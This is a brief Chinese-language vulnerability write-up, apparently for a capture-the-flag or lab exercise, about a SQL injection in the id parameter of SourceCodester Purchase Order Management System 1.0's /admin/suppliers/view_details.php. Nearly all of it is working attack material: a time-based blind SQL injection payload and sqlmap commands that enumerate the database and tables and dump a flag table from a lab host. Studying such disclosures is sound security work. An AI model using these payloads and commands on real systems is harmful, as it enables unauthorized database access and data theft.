漏洞简介
在SourceCodester采购订单管理系统1.0中发现了一项被分类为关键的漏洞。受影响的是组件GET参数处理器的文件/admin/suppliers/view_details.php中的一个未知函数。对参数id的操纵导致了SQL注入。可以远程发起攻击。
漏洞复现
Poc:
/admin/suppliers/view_details.php?id=1' AND (SELECT 9753 FROM (SELECT(SLEEP(5)))byoK) AND 'cyXd'='cyXd
Exp:
sqlmap一把梭。
爆库:
sqlmap -u http://eci-2zegp231xhs69bo4nt9e.cloudeci1.ichunqiu.com/admin/suppliers/view_details.php?id=1 --current-db --batch
爆表:
sqlmap -u http://eci-2zegp231xhs69bo4nt9e.cloudeci1.ichunqiu.com/admin/suppliers/view_details.php?id=1 -D purchase_order_db --tables --batch
爆数据:
sqlmap -u http://eci-2zegp231xhs69bo4nt9e.cloudeci1.ichunqiu.com/admin/suppliers/view_details.php?id=1 -D purchase_order_db -T fllllaaaag --dump --batch